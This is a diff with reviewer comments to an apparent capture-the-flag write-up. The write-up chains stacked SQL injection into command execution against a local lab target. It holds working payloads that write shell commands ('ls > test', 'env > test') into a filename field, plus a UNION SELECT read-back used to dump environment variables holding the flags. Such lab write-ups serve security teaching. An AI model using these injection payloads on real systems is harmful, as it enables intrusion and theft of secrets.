@@ -44,14 +44,20 @@ Successfully updated file title 3.
4444
4545Now we can update ** filename** to perform RCE.
4646
47+ [ http://127.0.0.1/xxxxxxxxxx/fetch?id=1;UPDATE photos SET filename='* || ls > test' WHERE id=3;COMMIT;--] ( )
48+ 4749``` sql
4850id= 1 ;UPDATE photos SET filename= ' * || ls > test' WHERE id= 3 ;COMMIT ;--
4951```
5052
51- Visit ** INDEX** page to execute the command.
53+ Visit ** INDEX** http://127.0.0.1/xxxxxxxxxx/ page to execute the command.
54+ 55+ And then go check the execution result
56+ 57+ [ http://127.0.0.1/xxxxxxxxxx/fetch?id=1.1 UNION SELECT 'test'--] ( )
5258
5359``` sql
54- id= 1 UNION SELECT ' test' --
60+ id= 1 . 1 UNION SELECT ' test' --
5561```
5662
5763Here we got ** ls** results in file ** test**
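Review bot: the `UNION SELECT` request is changed from `id=1` to `id=1.1` with no explanation in the surrounding text, and the reader is left to guess why the id is altered between the write step and the read-back step; add one sentence stating the reason before the code block. The two added request lines also use link syntax with an empty target (`[ http://127.0.0.1/xxxxxxxxxx/fetch?id=... ] ( )`), so they render as literal brackets rather than links; either drop the brackets and show the URL in an inline code span, or put the URL in the link target. The reworded instruction "Visit ** INDEX** http://127.0.0.1/xxxxxxxxxx/ page" reads awkwardly with the URL inserted mid-sentence; consider "Visit the **INDEX** page (http://127.0.0.1/xxxxxxxxxx/) to execute the command."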
@@ -62,14 +68,20 @@ Dockerfile files main.py main.pyc prestart.sh requirements.txt test uwsgi.ini
6268
6369## 0x03 FLAG
6470
71+ [ http://127.0.0.1/xxxxxxxxxx/fetch?id=1;UPDATE photos SET filename='* || env > test' WHERE id=3;COMMIT;--] ( )
72+ 6573``` sql
6674id= 1 ;UPDATE photos SET filename= ' * || env > test' WHERE id= 3 ;COMMIT ;--
6775```
6876
69- Visit ** INDEX** page to execute the command.
77+ Visit ** INDEX** http://127.0.0.1/xxxxxxxxxx/ page to execute the command.
78+ 79+ And then go get the flags
80+ 81+ [ http://127.0.0.1/xxxxxxxxxx/fetch?id=1.1 UNION SELECT 'test'--] ( )
7082
7183``` sql
72- id= 1 UNION SELECT ' test' --
84+ id= 1 . 1 UNION SELECT ' test' --
7385```
7486
7587Here we got all 3 flags in one place.
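Review bot: same issues as the previous hunk: the switch to `id=1.1` is unexplained, the request lines use link syntax with an empty `( )` target, and "Visit ** INDEX** http://127.0.0.1/xxxxxxxxxx/ page" should read "Visit the **INDEX** page (http://127.0.0.1/xxxxxxxxxx/)". In addition, "And then go get the flags" does not say how the flags get into `test`; since the preceding command writes `env > test`, state explicitly that the flags are read from the process environment, which is what "all 3 flags in one place" relies on. Consider also factoring the repeated URL/SQL pairs into a single explanation in 0x02 and referring back to it here instead of duplicating the blocks.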